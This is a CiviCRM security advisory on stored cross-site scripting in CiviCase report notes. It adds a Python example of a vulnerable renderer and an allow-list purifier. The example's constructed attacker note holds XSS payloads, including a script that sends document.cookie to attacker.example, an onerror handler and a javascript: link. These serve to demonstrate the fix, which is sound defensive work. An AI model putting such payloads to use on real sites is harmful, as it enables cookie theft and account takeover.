CIVI-SA-2020-04: Cross Site Scripting within CiviCase Reports

Published
2020-04-15 12:00

CiviCRM did not properly purify the content of the note fields attached to CiviCase activities when generating Case Reports or viewing the Case Activity, so markup placed in a note was rendered as-is for anyone viewing the report or activity (stored cross-site scripting).
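As an added illustration of the failure mode and the fix pattern (this is not CiviCRM code and not the patch shipped in 5.24.3 / 5.21.3), the Python sketch below renders a case-activity note into report HTML twice: once as-is, the way an unpurified field reaches the page, and once through an allow-list HTML purifier. The attacker note, the tag allow-list and the two render helpers are all constructed for this example; a production system should use an established purifier library rather than the minimal one here.

```python
"""Added example (not CiviCRM code): render a case-activity note into a report
with and without an allow-list HTML purifier.  All input is constructed."""
from html import escape
from html.parser import HTMLParser

# Allow-list: tags a note may contain and the attributes each may carry.
# Anything not listed (script, img, event handlers, ...) is dropped.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "em": set(),
    "strong": set(), "ul": set(), "ol": set(), "li": set(),
    "a": {"href", "title"},
}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class Purifier(HTMLParser):
    """Rebuilds the fragment from the allow-list, escaping every text node."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside a dropped <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            # Drop the body of script/style too, so the payload text does not
            # reappear in the report as (harmless but confusing) plain text.
            if tag in ("script", "style"):
                self._skip_depth += 1
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue  # rejects javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            if self._skip_depth:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data))


def purify_html(fragment: str) -> str:
    """Return the fragment with only allow-listed tags/attributes, text escaped."""
    p = Purifier()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


def render_note_vulnerable(note: str) -> str:
    """Pre-fix behaviour: the stored note is interpolated into the page as-is."""
    return f"<div class='activity-note'>{note}</div>"


def render_note_fixed(note: str) -> str:
    """Fixed behaviour: the stored note is purified before it reaches the page."""
    return f"<div class='activity-note'>{purify_html(note)}</div>"


# Constructed attacker note carrying three stored-XSS vectors a purifier must
# neutralise: a script element, an event-handler attribute, a javascript: URL.
ATTACKER_NOTE = (
    "<p>Client called <b>today</b>.</p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src=x onerror="alert(document.domain)">'
    '<a href="javascript:alert(1)" title="t">link</a>'
)

if __name__ == "__main__":
    print("vulnerable:", render_note_vulnerable(ATTACKER_NOTE))
    print("fixed:     ", render_note_fixed(ATTACKER_NOTE))
```

Escaping the whole note on output would also stop the script, but it would destroy the formatting users expect in notes; a purifier keeps the allowed markup and removes everything else, which is why an allow-list (never a deny-list of known-bad tags) is the right shape for this fix.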

Security Risk
Moderately Critical
Vulnerability
Cross Site Scripting
Affected Versions

CiviCRM version 5.24.2 and earlier

Fixed Versions

CiviCRM version 5.24.3 & 5.21.3

Solutions

Upgrade to the latest CiviCRM version (5.24.3, or 5.21.3 on the 5.21 line).

Credits

Patrick Figel (Greenpeace CEE) for reporting the issue
Seamus Lee (JMA Consulting/CiviCRM) and Patrick Figel (Greenpeace CEE) for resolving the issue

References

security/core#40